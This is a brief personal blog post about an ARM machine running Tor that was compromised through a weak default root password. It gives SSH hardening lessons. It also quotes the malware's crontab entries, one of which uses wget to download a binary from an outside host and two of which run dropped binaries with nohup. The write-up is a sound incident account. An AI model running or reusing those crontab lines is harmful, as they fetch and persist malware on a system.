Three days to posession

As an experiment, I hooked up a spare ARM machine to the internet and left it running Tor. It only took three days for a script kiddie to break in, as it turns out the pre-built rootfs I used has a poor default root password.

So the lessons are:

  • Always clear the root password.

    • Disable root login in sshd_config.

      • Disable password logins in sshd_config and use keys only.

      The particular virus uses Perl to run a script that masquerades as /usr/sbin/apache/log. It overwrites /var/spool/cron/crontab/root to fetch various things over reboot including writing various binaries like /etc/atddd. Some example lines:

      */120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
      */99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
      */100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
      

      These are all x86 statically linked binaries. I don’t think they’re run too good on ARM 🙂

      Time to nuke the system. It’s the only way to be sure.

Avatar
Michael Hope
Software Engineer